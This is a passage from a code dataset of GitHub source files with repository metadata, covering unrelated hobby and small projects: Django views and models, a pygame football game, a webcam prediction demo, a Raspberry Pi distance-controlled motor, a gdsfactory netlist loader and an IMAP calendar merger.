fa.extract_radiomics_features(vessel_segment, original_image)\n feature_dict.update(pos_features)\n feature_dict.update(image_features)\n sorted_keys = sorted(feature_dict)\n features = []\n for k in sorted_keys:\n fea = (feature_dict[k] - np.min(FEATURE_DICT_ALL[k])) / (np.max(FEATURE_DICT_ALL[k]) - np.min(FEATURE_DICT_ALL[k]))\n features.append(fea)\n\n vessel_segment.features = features\n # new\n # vessel_segment.vessel_centerline = None\n vessel_segment.vessel_centerline = np.asarray(vessel_segment.vessel_centerline, np.uint8)\n vessel_segment.vessel_mask = None\n vessel_segment.vessel_centerline_dist = None\n\n\n pickle.dump(g, open(os.path.join(args.base_path, args.project_path, args.save_path, f\"{selected_sample_name}.pkl\"), \"wb\"))\n \n\n # generate training samples for 2GM\n if not os.path.isdir(os.path.join(args.base_path, args.project_path, \"ngm_data\")):\n os.makedirs(os.path.join(args.base_path, args.project_path, \"ngm_data\"))\n\n # graph_names = glob(os.path.join(args.base_path, args.project_path, args.save_path, \"*.pkl\"))\n # for i in tqdm(range(len(graph_names))):\n # for j in range(len(graph_names)):\n # if i!=j:\n # data_file_path_0 = graph_names[i][:graph_names[i].rfind(\"/\")]\n # sample_id_0 = graph_names[i][graph_names[i].rfind(\"/\")+1:graph_names[i].rfind(\".pkl\")]\n # category_0 = ARTERY_CATEGORY[0] if sample_id_0.rfind(ARTERY_CATEGORY[0]) != -1 else ARTERY_CATEGORY[1]\n\n # data_file_path_1 = graph_names[j][:graph_names[j].rfind(\"/\")]\n # sample_id_1 = graph_names[j][graph_names[j].rfind(\"/\")+1:graph_names[j].rfind(\".pkl\")]\n # category_1 = ARTERY_CATEGORY[0] if sample_id_1.rfind(ARTERY_CATEGORY[0]) != -1 else ARTERY_CATEGORY[1]\n # if category_0 == category_1:\n # image, bin, g0 = _load_graph(data_file_path_0, sample_id_0)\n # image, bin, g1 = _load_graph(data_file_path_1, sample_id_1)\n\n # g0, g1 = __switch__(g0, g1)\n # # build graph\n # gm_data = __build_2gm_pair(g0, g1, category_0, [sample_id_0, sample_id_1])\n # gm_data = collate_fn([gm_data])\n # pickle.dump(gm_data, \n # open(os.path.join(args.base_path, args.project_path, \"ngm_data\", f\"{sample_id_0}_{sample_id_1}.pkl\"), \"wb\"))\n\n","repo_name":"chenzhao2023/ICA_Semantic_Baseline","sub_path":"ThinkMatch/prepare_data_featvec.py","file_name":"prepare_data_featvec.py","file_ext":"py","file_size_in_byte":24701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24883982284","text":"from django.forms import ValidationError\nfrom 
rest_framework import serializers\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\nfrom delilahdawgapi.models import Post, Reaction, PostReaction\n\nclass PostReactionView(ViewSet):\n\n def create(self, request):\n \n user = request.auth.user.rare_user\n # user = RareUser.objects.get(pk=request.data[\"rareuserId\"])\n post = Post.objects.get(pk=request.data[\"postId\"])\n reaction = Reaction.objects.get(pk=request.data[\"reactionId\"])\n \n postreaction = PostReaction()\n postreaction.user = user\n postreaction.post = post\n postreaction.reaction = reaction\n \n try:\n postreaction.save()\n serializer = PostReactionSerializer(postreaction, context={'request': request})\n return Response(serializer.data)\n \n except ValidationError as ex:\n return Response({\"reason\": ex.message}, status=status.HTTP_400_BAD_REQUEST)\n \n def destroy(self, request, pk=None):\n try:\n postreaction = PostReaction.objects.get(pk=pk)\n postreaction.delete()\n \n return Response({}, status=status.HTTP_204_NO_CONTENT)\n \n except PostReaction.DoesNotExist as ex:\n return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)\n \n except Exception as ex:\n return Response({'message': ex.args[0]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n \nclass PostReactionSerializer(serializers.ModelSerializer):\n class Meta:\n model = PostReaction\n field = ('id', 'user', 'post', 'reaction')","repo_name":"nss-evening-cohort-15/rare-api-v2-cool-name","sub_path":"delilahdawgapi/views/post_reaction.py","file_name":"post_reaction.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"15550301085","text":"import pygame, sys, os\r\nfrom pygame.math import Vector2\r\nFPS = 60\r\npygame.init()\r\nscreen_width = 1250\r\nscreen_height = 650\r\nscreen = pygame.display.set_mode((screen_width, screen_height))\r\ngame_icon = pygame.image.load(os.path.join ('support', 'gameicon.png')).convert_alpha()\r\npygame.display.set_icon(game_icon)\r\npygame.display.set_caption(\"Football\")\r\nclock = pygame.time.Clock()\r\nfullscreen = False\r\n#game font\r\ngame_font = pygame.font.Font(os.path.join ('support','freesansbold.ttf'), 32)\r\n\r\n#sounds\r\nball_hit = pygame.mixer.Sound(os.path.join ('support', \"ball_hit.wav\"))\r\nscore_m = pygame.mixer.Sound(os.path.join ('support',\"score.wav\"))\r\nboo = pygame.mixer.Sound(os.path.join ('support',\"boo.wav\"))\r\nplayer_hit = pygame.mixer.Sound(os.path.join ('support',\"ball_hitr.wav\"))\r\n\r\n#background\r\nbackground = pygame.image.load(os.path.join ('support', 'BG_IMG.png')).convert()\r\nplayer1_goal = pygame.Rect(5, screen_height/2-82, 10, 170)\r\nplayer2_goal = pygame.Rect(screen_width-15, screen_height/2-82, 10, 170)\r\n\r\n#player1\r\nplayer1 = pygame.image.load(os.path.join ('support','player1.png')).convert_alpha()\r\nplayer1_player = player1\r\nplayer1_angle = 0\r\nplayer1_velocity = Vector2(-3,0)\r\nplayer1_position = Vector2(screen_width/2+300, screen_height/2-50)\r\nplayer1_rect = player1.get_rect(center = player1_position)\r\nplayer1_mask = pygame.mask.from_surface(player1)\r\nplayer1_score = 0\r\nplay1_stext = game_font.render(\"player1 \", False, (200, 200, 200))\r\n\r\n#player2\r\nplayer2 = pygame.image.load(os.path.join ('support','player2.png')).convert_alpha()\r\nplayer2_player = player2\r\nplayer2_angle = 0\r\nplayer2_velocity = Vector2(3,0)\r\nplayer2_position = 
Vector2(screen_width/2-300, screen_height/2+50)\r\nplayer2_rect = player2.get_rect(center = player2_position)\r\nplayer2_mask = pygame.mask.from_surface(player2)\r\nplayer2_score = 0\r\nplay2_stext = game_font.render(\"player2 \", False, (200, 200, 200))\r\n\r\n#ball\r\nball = pygame.Surface((30, 30), pygame.SRCALPHA)\r\npygame.draw.circle(ball, [255, 255, 255], [15, 15], 15)\r\nball_vel = Vector2(0, 0)\r\nball_pos = Vector2(screen_width/2, screen_height/2)\r\nball_rect = ball.get_rect(center = ball_pos)\r\nball_mask = pygame.mask.from_surface(ball)\r\n \r\nrun = False\r\npause = False\r\nmain = True\r\nwhile main == True: \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n if event.type == pygame.VIDEORESIZE:\r\n if not fullscreen:\r\n screen = pygame.display.set_mode((event.w, event.h), pygame.RESIZABLE)\r\n\r\n if event.type == pygame.KEYDOWN:\r\n main = False\r\n run = True\r\n if event.key == pygame.K_f:\r\n fullscreen = not fullscreen\r\n if fullscreen:\r\n screen = pygame.display.set_mode(monitor_size, pygame.FULLSCREEN)\r\n else:\r\n screen = pygame.display.set_mode((screen.get_width(), screen.get_height()), pygame.RESIZABLE)\r\n mainscreen = pygame.image.load(os.path.join ('support','main_screen.png')).convert()\r\n screen.blit(mainscreen,(0,0))\r\n pygame.display.flip()\r\n clock.tick(10)\r\n \r\nwhile run == True:\r\n pygame.mixer.unpause()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n run=False\r\n \r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_DOWN]:\r\n player1_angle +=5\r\n player1_velocity.rotate_ip(-5)\r\n player1_player = pygame.transform.rotate(player1, player1_angle)\r\n player1_rect = player1_player.get_rect(center = player1_rect.center)\r\n player1_mask = pygame.mask.from_surface(player1_player)\r\n \r\n elif keys[pygame.K_UP]:\r\n player1_angle -=5\r\n player1_velocity.rotate_ip(5)\r\n player1_player = pygame.transform.rotate(player1, player1_angle)\r\n player1_rect = player1_player.get_rect(center = player1_rect.center)\r\n player1_mask = pygame.mask.from_surface(player1_player)\r\n\r\n if keys[pygame.K_LEFT]:\r\n player1_angle +=5\r\n player1_velocity.rotate_ip(-5)\r\n player1_player = pygame.transform.rotate(player1, player1_angle)\r\n player1_rect = player1_player.get_rect(center = player1_rect.center)\r\n player1_mask = pygame.mask.from_surface(player1_player)\r\n \r\n elif keys[pygame.K_RIGHT]:\r\n player1_angle -=5\r\n player1_velocity.rotate_ip(5)\r\n player1_player = pygame.transform.rotate(player1, player1_angle)\r\n player1_rect = player1_player.get_rect(center = player1_rect.center)\r\n player1_mask = pygame.mask.from_surface(player1_player)\r\n\r\n if keys[pygame.K_w]:\r\n player2_angle +=5\r\n player2_velocity.rotate_ip(-5)\r\n player2_player = pygame.transform.rotate(player2, player2_angle)\r\n player2_rect = player2_player.get_rect(center = player2_rect.center)\r\n player2_mask = pygame.mask.from_surface(player2_player)\r\n \r\n elif keys[pygame.K_s]:\r\n player2_angle -=5\r\n player2_velocity.rotate_ip(5)\r\n player2_player = pygame.transform.rotate(player2, player2_angle)\r\n player2_rect = player2_player.get_rect(center = player2_rect.center)\r\n player2_mask = pygame.mask.from_surface(player2_player)\r\n\r\n if keys[pygame.K_a]:\r\n player2_angle +=5\r\n player2_velocity.rotate_ip(-5)\r\n player2_player = pygame.transform.rotate(player2, player2_angle)\r\n player2_rect = player2_player.get_rect(center = 
player2_rect.center)\r\n player2_mask = pygame.mask.from_surface(player2_player)\r\n \r\n elif keys[pygame.K_d]:\r\n player2_angle -=5\r\n player2_velocity.rotate_ip(5)\r\n player2_player = pygame.transform.rotate(player2, player2_angle)\r\n player2_rect = player2_player.get_rect(center = player2_rect.center)\r\n player2_mask = pygame.mask.from_surface(player2_player)\r\n\r\n if keys[pygame.K_SPACE]:\r\n pause = True\r\n pygame.mixer.pause()\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 3:\r\n ball_vel = Vector2(0, 0)\r\n ball_pos = Vector2(screen_width/2, screen_height/2)\r\n pygame.mixer.Sound.play(boo)\r\n current_time = pygame.time.get_ticks()\r\n player1_position += player1_velocity\r\n player1_rect.center = player1_position\r\n player2_position += player2_velocity\r\n player2_rect.center = player2_position\r\n ball_vel *= 0.99\r\n ball_pos += ball_vel\r\n ball_rect.center = ball_pos\r\n\r\n player1_offset = player1_rect[0] -ball_rect[0], player1_rect[1] -ball_rect[1]\r\n player1_overlap = ball_mask.overlap(player1_mask, player1_offset)\r\n\r\n player2_offset = player2_rect[0] -ball_rect[0], player2_rect[1] -ball_rect[1]\r\n player2_overlap = ball_mask.overlap(player2_mask, player2_offset)\r\n\r\n if player1_overlap:\r\n ball_vel = Vector2(player1_velocity) *1.4\r\n pygame.mixer.Sound.play(ball_hit)\r\n \r\n if player2_overlap:\r\n ball_vel = Vector2(player2_velocity) *1.4\r\n pygame.mixer.Sound.play(ball_hit)\r\n \r\n if player1_overlap and player2_overlap:\r\n player1_overlap = None\r\n player2_overlap = None\r\n ball_vel *= 0\r\n \r\n if ball_pos[0]>= screen_width-25 or ball_pos[0]<= 25 or ball_pos[1]>= screen_height-30 or ball_pos[1]<= 30:\r\n pygame.mixer.Sound.play(ball_hit)\r\n\r\n if ball_pos[0]>= screen_width-25:\r\n ball_pos[0] = screen_width-26\r\n ball_vel *= -0.99 \r\n if ball_pos[0]<= 25:\r\n ball_pos[0] = 26\r\n ball_vel *= -0.99\r\n if ball_pos[1]>= screen_height-30:\r\n ball_pos[1] = screen_height-31\r\n ball_vel *= -0.99\r\n if ball_pos[1]<= 30:\r\n ball_pos[1] = 31\r\n ball_vel *= -0.99\r\n \r\n if player1_position[0]>= screen_width-25 or player1_position[0]<= 25 or player1_position[1]>= screen_height-25 or player1_position[1]<= 25:\r\n player1_velocity = -player1_velocity\r\n pygame.mixer.Sound.play(player_hit)\r\n #or player1_velocity = pygame.math.Vector2.reflect(player1_velocity, player1_velocity)\r\n \r\n if player2_position[0]>= screen_width-25 or player2_position[0]<= 25 or player2_position[1]>= screen_height-25 or player2_position[1]<= 25:\r\n player2_velocity = -player2_velocity\r\n pygame.mixer.Sound.play(player_hit)\r\n\r\n if ball_rect.colliderect(player1_goal):\r\n player1_score += 1\r\n ball_vel = Vector2(0, 0)\r\n ball_pos = Vector2(screen_width/2, screen_height/2)\r\n play1_stext = game_font.render(f\"player1 {player1_score}\", False, (200, 200, 200))\r\n pygame.mixer.Sound.play(score_m)\r\n \r\n if ball_rect.colliderect(player2_goal):\r\n player2_score += 1\r\n ball_vel = Vector2(0, 0)\r\n ball_pos = Vector2(screen_width/2, screen_height/2)\r\n play2_stext = game_font.render(f\"player2 {player2_score}\", False, (200, 200, 200))\r\n pygame.mixer.Sound.play(score_m)\r\n \r\n while pause == True:\r\n for event in pygame.event.get():\r\n pause_text = game_font.render(f\"press a key to continue\", False, (255, 255, 255))\r\n screen.blit(pause_text,(screen_width/2-180, screen_height/2))\r\n pygame.display.flip()\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n pause = 
False\r\n \r\n screen.blit(background,(0,0))\r\n #pygame.draw.rect(screen, (200, 200, 200), player1_goal)\r\n #pygame.draw.rect(screen, (200, 200, 200), player2_goal)\r\n screen.blit(play2_stext,(100,15))\r\n screen.blit(play1_stext,(995,15))\r\n screen.blit(ball, ball_rect)\r\n screen.blit(player1_player, player1_rect)\r\n screen.blit(player2_player, player2_rect)\r\n pygame.display.flip()\r\n clock.tick(FPS)\r\n","repo_name":"Ponsajjan/2Dfootball","sub_path":"footballpy.py","file_name":"footballpy.py","file_ext":"py","file_size_in_byte":9956,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18113203960","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nfrom keras.models import load_model\nimport csv\n\nimport configuration\n\n__author__ = \"ujihirokazuya\"\n__date__ = \"2017/10/28\"\n\n\nclass Demo(object):\n\n # _seq_size = 40\n _seq_size = 150\n # _count_size = 3\n _count_size = 1\n _image_shape = (80, 80)\n\n def __init__(self):\n self.category_dict = dict()\n with open(\"data/data_list/class_id.txt\", \"r\") as f:\n reader = csv.reader(f, delimiter=\" \")\n for row in reader:\n self.category_dict[int(row[0])] = row[1]\n model = load_model(configuration.model_file_name)\n self.model = model\n cap = cv2.VideoCapture(0)\n cap.set(cv2.CAP_PROP_FPS, 30)\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, 80)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 80)\n fps = cap.get(cv2.CAP_PROP_FPS)\n size = cap.get(cv2.CAP_PROP_FRAME_WIDTH), cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n print(\"fps:{}\".format(fps))\n print(\"video size:{}\".format(size))\n self.video_capture = cap\n\n def __enter__(self):\n pass\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.video_capture.release()\n cv2.destroyAllWindows()\n\n def _predict(self, frames):\n frames = np.array(frames)\n frames = frames[:, :, :, np.newaxis]\n frames = (frames / 255.).astype(np.float32)\n x_test = frames[np.newaxis, :, :, :, :]\n result = self.model.predict_classes(x_test, batch_size=1)\n print(result)\n print(self.category_dict.get(result[0]))\n # result2 = self.model.predict(x_test, batch_size=1)\n # print(result2)\n\n def execute(self):\n frames = list()\n count = 0\n print(\"fps:{}\".format(self.video_capture.get(cv2.CAP_PROP_FPS)))\n print(\"w:{}\".format(self.video_capture.get(cv2.CAP_PROP_FRAME_WIDTH)))\n print(\"h:{}\".format(self.video_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n is_valid = False\n while True:\n _, frame = self.video_capture.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n if cv2.waitKey(1) & 0xFF == ord('e'):\n is_valid = not is_valid\n if is_valid:\n if self._can_add_frame(count):\n self._add_frames(frames, gray)\n count += 1\n if self._can_predict(frames):\n self._predict(frames)\n frames.clear()\n is_valid = False\n count = 0\n print(count)\n if is_valid:\n text = \"valid\"\n else:\n text = \"invalid\"\n font = cv2.FONT_HERSHEY_PLAIN\n cv2.putText(gray, text, (10, 30), font, 2, (0, 0, 0))\n cv2.imshow('frame', gray)\n\n def _add_frames(self, frames: list, gray):\n frame = cv2.resize(gray, self._image_shape)\n frames.append(frame)\n print(len(frames))\n\n def _can_add_frame(self, count: int):\n return count % self._count_size == 0\n\n def _can_predict(self, frames: list):\n return len(frames) == self._seq_size\n\n\ndef main():\n demo = Demo()\n with demo:\n # demo.execute()\n demo.save_picture()\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"ujhrkzy/iris","sub_path":"iris/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70383084168","text":"from app.models import db, Anime\nimport requests\n\n\ndef retrieve_data(url):\n headers = {\n \"Accept\": \"application/vnd.api+json\",\n \"Content-Type\": \"application/vnd.api+json\"\n }\n list_of_anime = requests.get(url, headers=headers)\n return list_of_anime.json()\n\n\ndef seed_animes():\n anime = []\n url = 'https://kitsu.io/api/edge/anime?sort=popularityRank'\n count = 0\n while count < 10:\n response = retrieve_data(url)\n anime.extend(response[\"data\"])\n url = response[\"links\"][\"next\"]\n count += 1\n\n for i in anime:\n print(i[\"id\"])\n anime_series = Anime(\n title=i[\"attributes\"][\"canonicalTitle\"],\n image=i[\"attributes\"][\"posterImage\"][\"small\"],\n release_date=i[\"attributes\"][\"startDate\"],\n trailer_url=\"http://www.youtube.com/watch?v=\" +\n i[\"attributes\"][\"youtubeVideoId\"],\n description=i[\"attributes\"][\"synopsis\"],\n )\n db.session.add(anime_series)\n db.session.commit()\n\n\ndef undo_animes():\n db.session.execute('TRUNCATE animes restart identity CASCADE;')\n db.session.commit()\n","repo_name":"cabarnes2020/anime-tion","sub_path":"app/seeds/animes.py","file_name":"animes.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"28723946531","text":"import RPi.GPIO as GPIO\nimport time\n\n# 거리가 가까워지면 모터가 빠르게 돌음\n\ndef detect_distance():\n GPIO.output(ultra_trig, False)\n time.sleep(0.5)\n\n GPIO.output(ultra_trig, True)\n time.sleep(0.00001)\n GPIO.output(ultra_trig, False)\n\n while GPIO.input(ultra_echo) == 0:\n pulse_start = time.time()\n while GPIO.input(ultra_echo) == 1:\n pulse_end = time.time()\n\n pulse_duration = pulse_end - pulse_start\n dist = pulse_duration * 17000\n return round(dist, 2)\n\n\nGPIO.setmode(GPIO.BCM)\n\n# ultrasonic sensor\nultra_trig = 18\nultra_echo = 21\n\nGPIO.setup(ultra_trig, GPIO.OUT)\nGPIO.setup(ultra_echo, GPIO.IN)\n\n# dcmotor\ndcmotor = 13\nGPIO.setup(dcmotor, GPIO.OUT)\nPWM_dcmotor = GPIO.PWM(dcmotor, 50)\n\nPWM_dcmotor.start(0)\nPWM_dcmotor.ChangeDutyCycle(0)\n\n# 변수 선언\ndistance = 0\n\ntry:\n while True:\n distance = detect_distance()\n\n if (distance <= 30):\n PWM_dcmotor.ChangeDutyCycle((30 - distance) / 1.5)\n else:\n PWM_dcmotor.ChangeDutyCycle(0)\nexcept KeyboardInterrupt:\n GPIO.cleanup()\n\n\n","repo_name":"min02choi/Sensor-Programming","sub_path":"sensor_study/dcmotor_test.py","file_name":"dcmotor_test.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33502855363","text":"\"\"\" write a Component from the YAML netlist\n\nDeprecated! use pp/component_from_yaml instead!\n\n.. 
code::\n\n top_arm\n -CP1= =CP2-\n bot_arm\n\"\"\"\n\nfrom typing import Union, IO, Any\nimport pathlib\nimport io\nfrom omegaconf import OmegaConf\n\nfrom pp.component import Component\nfrom pp.components import component_type2factory as component_type2factory_default\nfrom pp.netlist_to_gds import netlist_to_component\n\n\nsample = \"\"\"\n\ninstances:\n CP1:\n component: mmi1x2\n settings:\n width_mmi: 4.5\n length_mmi: 10\n CP2:\n component: mmi1x2\n settings:\n width_mmi: 4.5\n length_mmi: 5\n transformations: mirror_y\n arm_top:\n component: mzi_arm\n settings:\n L0: 10\n DL: 0\n arm_bot:\n component: mzi_arm\n settings:\n L0: 100\n DL: 0\n transformations: mirror_x\n\nconnections:\n - [CP1, E0, arm_bot, W0]\n - [arm_bot, E0, CP2, E0]\n - [CP1, E1, arm_top, W0]\n - [arm_top, E0, CP2, E0]\n\nports_map:\n W0: [CP1, W0]\n E0: [CP2, W0]\n E_TOP_0: [arm_top, E_0]\n E_TOP_1: [arm_top, E_1]\n E_TOP_2: [arm_top, E_2]\n E_TOP_3: [arm_top, E_3]\n E_BOT_0: [arm_bot, E_0]\n E_BOT_1: [arm_bot, E_1]\n E_BOT_2: [arm_bot, E_2]\n E_BOT_3: [arm_bot, E_3]\n\n\"\"\"\n\n\ndef netlist_from_yaml(\n yaml: Union[str, pathlib.Path, IO[Any]], component_type2factory=None,\n) -> Component:\n \"\"\" Loads Component settings from YAML file, and connections\n\n Deprecated! use component_from_yaml instead\n\n Args:\n netlist: YAML IO describing instances, connections and ports_map\n\n Returns:\n Component\n\n .. code-block:: yaml\n\n instances:\n CP1:\n component: mmi1x2\n settings:\n width_mmi: 4.5\n length_mmi: 10\n CP2:\n component: mmi1x2\n settings:\n width_mmi: 4.5\n length_mmi: 5\n transformations: mirror_y\n arm_top:\n component: mzi_arm\n settings:\n L0: 10\n DL: 0\n arm_bot:\n component: mzi_arm\n settings:\n L0: 100\n DL: 0\n transformations: mirror_x\n\n ports_map:\n W0: [CP1, W0]\n E0: [CP2, W0]\n E_TOP_0: [arm_top, E_0]\n E_TOP_1: [arm_top, E_1]\n E_TOP_2: [arm_top, E_2]\n E_TOP_3: [arm_top, E_3]\n E_BOT_0: [arm_bot, E_0]\n E_BOT_1: [arm_bot, E_1]\n E_BOT_2: [arm_bot, E_2]\n E_BOT_3: [arm_bot, E_3]\n\n connections:\n - [CP1, E0, arm_bot, W0]\n - [arm_bot, E0, CP2, E0]\n - [CP1, E1, arm_top, W0]\n - [arm_top, E0, CP2, E0]\n\n \"\"\"\n\n yaml = io.StringIO(yaml) if isinstance(yaml, str) and \"\\n\" in yaml else yaml\n conf = OmegaConf.load(yaml)\n component_type2factory = component_type2factory or component_type2factory_default\n\n instances = {}\n for instance_name in conf.instances:\n instance_conf = conf.instances[instance_name]\n component_type = instance_conf[\"component\"]\n component_settings = instance_conf[\"settings\"] or {}\n instance = component_type2factory[component_type](**component_settings)\n instance_transformations = instance_conf[\"transformations\"] or \"None\"\n instance_properties = instance_conf[\"properties\"] or {}\n for k, v in instance_properties.items():\n setattr(instance, k, v)\n instance.name = instance_name\n instances[instance_name] = (instance, instance_transformations)\n\n connections = conf.connections\n ports_map = conf.ports_map\n return netlist_to_component(instances, connections, ports_map)\n\n\ndef test_netlist_from_yaml():\n c = netlist_from_yaml(sample)\n assert len(c.get_dependencies()) == 4\n return c\n\n\nif __name__ == \"__main__\":\n import pp\n\n # c = test_netlist_from_yaml()\n c = netlist_from_yaml(sample)\n 
pp.show(c)\n","repo_name":"PsiQ/gdsfactory","sub_path":"pp/netlist_from_yaml.py","file_name":"netlist_from_yaml.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"16"} +{"seq_id":"30791752128","text":"#!/usr/bin/env python3\n\n\nw, h, n = list(map(int, input().split()))\n\nleft = 0\nright = n * max(w, h)\n\nwhile right > left + 1:\n m = (right + left) // 2\n if (m // w) * (m // h) >= n:\n right = m\n else:\n left = m\n\nprint(right)\n","repo_name":"Bytamine/ff-olymp","sub_path":"22 binary search/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1281147471","text":"import imaplib\nimaplib._MAXLINE = 40000\nimport email\nfrom icalendar import Calendar, Event\nimport json\n\nclient_secrets = {}\nwith open(\"client_secrets.json\") as f:\n\tclient_secrets = json.load(f)\n\nmail = imaplib.IMAP4_SSL(client_secrets.imap_server)\nmail.login(client_secrets.login, client_secrets.password)\n# mail.list()\n# Out: list of \"folders\" aka labels in gmail.\nmail.select(\"calendar\") # connect to inbox.\n\n# Initialize a calendar to hold the merged data\nmerged_calendar = Calendar()\nmerged_calendar.add('prodid', '-//exchange//ecsorl.com//')\nmerged_calendar.add('calscale', 'GREGORIAN')\n\nimport datetime\ndate = (datetime.date.today() - datetime.timedelta(1)).strftime(\"%d-%b-%Y\")\nresult, uids = mail.uid('search', None, '(SENTSINCE {date})'.format(date=date))\ntry:\n\tfor uid in uids[0].split():\n\t\tresult, data = mail.uid('fetch', uid, '(RFC822)')\n\t\traw_email = data[0][1]\n\t\n\t\tmsg = email.message_from_string(raw_email)\n\t\t# print( msg['To'] )\n\t\t# print( email.utils.parseaddr(msg['From']) )\n\t\t# print( email_message.items() )\n\t\tfor part in msg.walk():\n\t\t\tif part.get_content_type() == 'text/calendar':\n\t\t\t\tics_text = part.get_payload(decode=1)\n\t\t\t\timporting = Calendar.from_ical(ics_text)\n\t\t\t\tfor event in importing.subcomponents:\n\t\t\t\t\tprint(event.name)\n\t\t\t\t\tif event.name != 'VEVENT':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tmerged_calendar.add_component(event)\nfinally:\n\t# Disconnect from the IMAP server\n\tif mail.state != 'AUTH':\n\t\tmail.close()\n\tmail.logout()\n\noutput = open( 'test.ics', 'wt')\ntry:\n\toutput.write(merged_calendar.to_ical()) #.decode('utf-8'))\nfinally:\n\toutput.close()\n","repo_name":"howchmo/exch03cal","sub_path":"exch03imap2ics.py","file_name":"exch03imap2ics.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24073686942","text":"from django.db import models\nfrom datetime import datetime\n\nclass Upload_list_opv2(models.Model):\n descricao = models.CharField(max_length=200, blank=False, null=False)\n arquivo = models.FileField(max_length=200, upload_to='static/arquivosxls/', blank=False, null=False)\n\n def __str__(self):\n return self.descricao\n\nclass Opsv2(models.Model):\n orcamento = models.IntegerField(blank=False, null=False)\n cliente = models.CharField(max_length=300, blank=False, null=False)\n servico = models.TextField(blank=False, null=False)\n quant = models.DecimalField(max_digits=7, decimal_places=0, blank=False, null=False)\n valor = models.DecimalField(max_digits=7, decimal_places=2, blank=False, null=False)\n entrada = models.DateField(blank=False, null=False)\n vendedor = 
models.CharField(max_length=100, blank=False, null=False)\n op = models.IntegerField(blank=False, null=False)\n prev_entrega = models.DateTimeField(blank=False, null=False)\n\n def status(self):\n stat = {}\n now = str(datetime.now())\n ent = str(self.prev_entrega)\n sepe = ent.split(' ')\n sepn = now.split(' ')\n dpe = datetime.strptime(sepe[0], '%Y-%m-%d').date()\n dpn = datetime.strptime(sepn[0], '%Y-%m-%d').date()\n diasp = str(dpe - dpn)\n diasat = str(dpn - dpe)\n sdias = diasp.split(' ')\n sdiasat = diasat.split(' ')\n if sdias[0] == '0:00:00':\n stat['diasp'] = 0\n else:\n stat['diasp'] = int(sdias[0])\n\n if sepe[0] < sepn[0]:\n stat['posicao'] = 'Atrasado a ' + str(sdiasat[0]) + ' dia(s)'\n elif sepe[0] == sepn[0]:\n stat['posicao'] = 'Entrega Hoje'\n elif diasp[0] <= '1':\n stat['posicao'] = 'Entrega Amanhã'\n else:\n stat['posicao'] = 'Entrega em ' + str(sdias[0]) + ' dias'\n\n return stat\n\n def __str__(self):\n return str(self.op) + ' - ' + self.cliente\n\n\nclass Reg_entregav2(models.Model):\n op = models.OneToOneField(Opsv2, on_delete=models.PROTECT, blank=False, null=False)\n produzido = models.DateField(blank=True, null=True)\n obs = models.CharField(max_length=50, blank=True, null=True)\n entrega = models.DateField(blank=True, null=True)\n cancelada = models.BooleanField(default=False)\n\n def statusent(self):\n statent = {}\n now = str(datetime.now())\n prod = str(self.produzido)\n sepe = prod.split(' ')\n sepn = now.split(' ')\n dpe = datetime.strptime(sepe[0], '%Y-%m-%d').date()\n dpn = datetime.strptime(sepn[0], '%Y-%m-%d').date()\n diasp = str(dpe - dpn)\n diasat = str(dpn - dpe)\n sdias = diasp.split(' ')\n sdiasat = diasat.split(' ')\n if sdias[0] == '0:00:00':\n statent['diasat'] = 0\n else:\n statent['diasat'] = int(sdiasat[0])\n\n\n if sepe[0] < sepn[0]:\n statent['posicao'] = 'Em expedição a ' + str(sdiasat[0]) + ' dias'\n elif sepe[0] == sepn[0]:\n statent['posicao'] = 'Entrou em expedição Hoje'\n\n return statent\n\n def __str__(self):\n\n if self.cancelada == True:\n return str(self.op) + ' - ' + str(self.entrega) + ' - Cancelada'\n\n return str(self.op) + ' - ' + str(self.produzido)\n","repo_name":"pwlimaverde/appecoprint","sub_path":"modulopcp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9446518825","text":"import math\n\nT = int(input())\n\nfor i in range(T):\n x, y = map(int, input().split())\n \n if y - x <= 3:\n print(y-x)\n else:\n N = int(math.sqrt(y-x))\n\n if N ** 2 == y - x :\n print(2*N-1)\n elif N ** 2 < y-x 